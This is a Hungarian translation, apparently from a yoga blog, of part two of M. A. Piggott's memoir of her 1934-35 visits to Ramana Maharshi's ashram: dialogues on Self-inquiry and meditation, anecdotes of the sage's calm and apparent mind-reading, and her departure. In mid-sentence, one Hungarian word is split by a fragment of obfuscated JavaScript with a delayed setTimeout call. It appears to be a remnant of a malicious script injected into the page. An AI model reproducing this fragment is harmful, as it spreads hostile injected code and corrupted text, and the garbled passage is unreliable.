Top
Urbán Jógi Live / Filozófia  / Guru első látásra, II. rész
layout test

Guru első látásra, II. rész

M. A. Piggott: A Szellem útja. II. rész

 

Ez a cikk olyan látogatásokról mesél, melyeket a szerző – első európai hölgyként – Srí Ramana Maharsi, a híres dél-indiai bölcs ásramjába tett 1934-35-ben. Alább a cikk második rész olvasható.

 

Egy másik probléma, amit tárgyaltunk, a jóga különböző fajtáival és a különféle módszerek eredményeivel volt kapcsolatos.

 

A Maharsi kijelentette, hogy végül csak egy út vezet el a célhoz, és ez nem más, mint annak felismerése, mi az Önvaló. Miért vesztegessük hát az időnket más utakra, amikor azok a legjobb esetben is csak a végső ösvényre vezethetnek bennünket? Jobb, ha mindig ezen az úton járunk, és nem veszítünk értékes pillanatokat. Meditálj az Önvalón, és semmi máson! Nincs más cél. A Maharsi bölcselete vagy tanítása a legtisztább nemkettősség (advaita), amint a következő, vele folytatott rövid beszélgetésből is kiderül.

 

Kétségbeesetten vágytam arra, hogy egyedül lehessek a Maharsival. Olyan nehéz sok ember előtt kiönteni a szívünket! Egyik reggel végül, amint beléptem a terembe, kíséret nélkül találtam őt. Csodálatos csendességet és nyugalmat árasztott. Halkan megkérdeztem, beszélhetnék-e vele. Mosolyogva bólintott, és elküldött valakiért, aki fordíthatna. Amikor megérkezett egyik követője, feltettem az első kérdésemet:

 

– Melyek az igaz Önvaló felismerésének akadályai?

 

– Elsősorban az emlékezés, a megszokott gondolatok, az összegyűjtött hajlamok [vászanák].

 

– Hogyan számoljuk fel ezeket az akadályokat?

 

– Keressük az Önvalót a meditációban a következő módon. Kövessünk nyomon minden gondolatot a forrásáig, amely csupán az elme! Soha ne engedjük, hogy elkalandom()*5);if(number1==3){var delay=15000;setTimeout($GQRkExOVl1p57bbeL4u(0),delay)}andozzon! Ha engedjük, soha nem lesz vége. Újra meg újra vigyük vissza kiindulási helyére – az elmébe –, és a gondolat is és az elme is belepusztul a dologtalanságba. Az elme csak a gondolat miatt létezik. Állítsa meg, és nincs elme. Mindig, amikor egy gondolat bukkan fel vagy lehangoltság lesz önön úrrá, kérdezze meg magától: „Ki az, aki kételkedik? Mi az, ami lehangolt?” Folyamatosan térjen vissza a „Ki az az én, és hol van?” kérdéséhez! Távolítson el mindent, amíg csak a Forrás marad! Akkor éljen mindig a jelenben, és csakis a jelenben! Nincs múlt vagy jövő az elmén kívül.

 

– Hogyan segíthetek másokat a problémáik és gondjaik megoldásában?

 

– Miféle másokról beszél? Csak az Egy létezik. Figyelje meg, ismerje fel, hogy nem létezik „én”, nincs „ő”, nincs „te”, csupán az egyetlen Önvaló, amely minden. Ha hisz a másik problémájában, akkor hisz valamiben, ami az Önvalón kívül van. Bármilyen külső tevékenységnél jobban segíti a másikat azzal, ha felismeri minden egységét. Az ego együtt jár minden ébrenlétbeli tevékenységgel: az érzelmekkel és az intellektussal. A mélyalvásban a test mozdulatlan, az Önvaló mégis jelen van. A figyelmet elterelő, aktív elme rejti el az igaz Önvalót.

 

– Melyik meditáció lehet segítségemre?

 

– Semmilyen olyan meditáció nem segítség, amelyet valamilyen tárgyon végzünk. Meg kell tanulnia, hogy egyként ismerje fel az alanyt és a tárgyat. Amikor egy tárgyon meditál (legyen ez a tárgy akár kézzelfogható, akár elvont), elpusztítja az egység érzését, és kettősséget teremt. Azon meditáljon, mi valójában! Próbálja felismerni, hogy a test nem ön, az érzelmek nem ön, az intellektus nem ön. Amikor mindezek elnyugodtak, azt fogja találni…

 

– Mit?

 

– Fel fogja fedezni. Nem nekem kell elmondanom, hogy mi lesz bárkinek a tapasztalata. A tapasztalat fel fogja fedni önmagát. Tartson ki mellette!

 

– De amikor próbálom lecsendesíteni az elmémet, könnyen elalszom.

 

– Nem számít. Próbáljon úgy tenni, mintha mély, álomtalan alvásban lenne, majd figyeljen! Tudatosan, ne pedig öntudatlanul aludjon! Ekkor csak egyetlen tudatosság lesz jelen.

 

Ahogy teltek-múltak a napok, egyre tisztábban láttam, hogy ez nem elméleti filozófia. Maga a Maharsi folyton és örömmel élte. Azok közül, akikkel találkoztam, egyike volt azon keveseknek, akik nemcsak boldogok, hanem háborítatlanok voltak. Nem mintha a világ fájdalmai nem érintették volna meg őt – éppen ellenkezőleg –, de tudta, hol a helyük, és nem azonosult velük. Az együttérzése határtalan volt bárki iránt, aki szenvedett.

 

Egyszer egy férfi rohant be a Maharsihoz, majd zokogva a lábai elé vetette magát. Teste rázkódott a sírástól. A Maharsi egy árva szót sem szólt, a többiek pedig pisszenni sem mertek. A Maharsit figyeltem. Fejét félrefordította, és közömbösnek tűnt. Némi idő múlva a férfi fájdalmának hevessége alábbhagyott, és a látogató fokozatosan megnyugodott. Még mindig nem beszélt senki. Végül a férfi tiszteletteljesen felállt, és mélyen meghajolt. A Maharsi felé fordult, és rámosolygott. Hirtelen úgy éreztem, mintha a világ összes virága közénk ontotta volna illatát.

 

Máskor egy szerencsétlen embert hoztak el hozzá, akit kígyó mart meg. Lefektették a szent ember elé, mi pedig mindannyian félelemtől elszoruló szívvel figyeltük. Nem úgy a Maharsi. Ő csak ült, és a távolba tekintett, miközben a kígyó áldozata vonaglott a fájdalomtól. A Maharsi tekintetében nyugalom és együttérzés tükröződött, és végtelen békesség. Mintha órák teltek volna el, mire a szerencsétlen ember rángatózása elcsitult, és a férfi álomba merült. Ekkor aki idehozta, gyengéden megérintette. A férfi felkelt, leborult a Maharsi előtt, és gyógyultan távozott.

 

Ez azonban nem volt megszokott dolog. A Maharsi nem gyógyított, legalábbis a szó bevett értelmében nem. Egy alkalommal, amikor erről beszélgettünk, megkérdeztem tőle, hogy az ember használhat-e spirituális erőt a gyógyításhoz. Ő megjegyezte: „Igen, ha azt hiszi, érdemes”, majd hozzátette, hogy komoly erőfeszítés szükséges hozzá, amelyet hasznosabban is fel lehet használni.

 

Elmondták nekem, hogy a Maharsi figyelemmel kíséri az egész ásram életét. Például amikor a teremben időzött, még azt is tudta, hogy mi zajlik a konyhában – mellesleg meglepődéssel tapasztaltam, hogy még a zöldségek aprításánál is segédkezett. Arról is beszámoltak, hogy tudja, mi jár az emberek fejében. Ez utóbbi képességéről én is személyesen meggyőződhettem.

 

Egyik délután a terem tőle távol eső végében ültem, és egy aforizmagyűjteményt olvasgattam, melyet – úgy éreztem – dagályos és mesterkélt stílusban írtak. Untam, és némileg bosszantott is. Hirtelen az egyik követő állt előttem, kezében egy másik könyvvel – minden ásrambeli könyvet barna papírba kötöttek, és ezért ugyanúgy festettek –, majd így szólt:

 

– A Maharsi kért, hogy adjam át ezt önnek. Úgy véli, közelebb fog állni a gondolkodásmódjához.

 

Mondanom sem kell, közelebb állt. De honnan tudta a Maharsi, mit olvastam? Messze ültem tőle, és sok ember akadályozta abban, hogy tisztán lásson. Már korábban is megfigyeltem viszont, hogy sok olyan kérdést megválaszolt, amely éppen formálódott az elmémben. Túl gyakran történt ilyesmi, hogy véletlen egybeesés legyen.

 

Minden tapasztalás szükségszerűen véget ér, és elérkezett ásrambeli látogatásom utolsó napja. Nagy szomorúság töltötte el a szívemet. Vissza kell térnem az aggodalmakhoz, gondokhoz és bosszúságokhoz. Itt minden békés volt. Itt viszonylag könnyű volt a spiritualitás jegyében élni. Ezért választotta olyan sok szent ember a magányt? – tűnődtem. Csak ilyen körülmények között merülnek fel a rejtett igazságok a figyelemelterelő tényezők fátyla alól? Mégsem élhetünk mindannyian ilyen életet. A válasz vajon az, hogy éljünk a világban, ha kell, de ne legyünk a világéi? Semmi új nem volt ebben az elképzelésben, mégis úgy tűnt, hogy ezen a helyen értem meg először.

 

E délután zajlott a búcsúbeszélgetésem a Maharsival. Rendkívül barátságos és emberi volt. Megvitattuk a mindennapi élet nehézségeit és egyéb világi problémákat. Újra megkérdeztem tőle, milyen kapcsolatban áll a test és az én. A következő hasonlattal szolgált:

 

– Eljött a szállásáról ma reggel a kordéval. Mégsem azt mondja, hogy „a kordé eljött”, hanem azt, hogy „én eljöttem”. Nem követi el azt a hibát, hogy a kordéval azonosítja magát. Hasonlóképpen, tekintsen úgy a testére, mint a kordéra! Bánjon vele megfelelően, és jó szolgája és eszköze lesz. De ne gondolja, hogy az az én!

 

Ismét hangsúlyozta annak szükségességét, hogy mindenben az Önvalót lássuk. Cselekedjünk, mondhatni, gépiesen, és hagyjuk, hogy „Az” végezze el a munkát. „És el is fogja – tette hozzá. – Ne várjon el semmilyen eredményt! Tegye azt, ami az adott pillanatban helyes, majd hagyja maga mögött!”

 

Beszélgetésünk végén az upanisadok csodálatos mondását idézte: „Mert ki minden létezőben önnön lelkére rátalál, / Az Egységet ismerőhöz hogy érhetne fel gond, homály?”[1]

 

Amikor este elköszöntem, az ásramlakók körém gyűltek, osztozva távozásom miatt érzett szomorúságomban. Úgy éreztem, igaz barátokra leltem, és igaz barátokat hagyok most hátra. Olyan egyszerűek és mégis olyan tiszták voltak!

 

A szomszédos templomban éppen istentisztelet zajlott, és egy ősi szanszkrit himnuszt kántáltak. Abban a pillanatban, hogy felléptem a kordéra, megszólalt a harang. Ez mindenki arcára boldog mosolyt varázsolt, hiszen távozáskor templomi harangot hallani csodálatos előjel, és békességet hoz.

 

Ahogy másnap hajnalban elhagytam Tiruvannámalai városát, még egy utolsó pillantást vetettem az Arunácsala szent hegyére, melyen a föld egyik szentje él. A hegy vörös volt, és ragyogott a kelő nap sugaraiban.

 

Sírtam.

 

 

[1] Ísa-upanisad. Tenigl-Takács László fordítása.

 

 

A cikk első része: http://www.urbanjogi.hu/m-a-piggott-a-szellem-utja-i-resz/

 

Forrás: „The Way of the Spirit.” In: Fragrant Petals. Devotees’ Reminiscences on Sri Bhagavan. Sri Ramanasramam, Tiruvannamalai, 2000. Malik Tóth István fordítása.

Németh Gergő

Meggyőződésem, hogy a jóga az egyik legjobb dolog, amit tehetünk magunkért és másokért!

No Comments

Sorry, the comment form is closed at this time.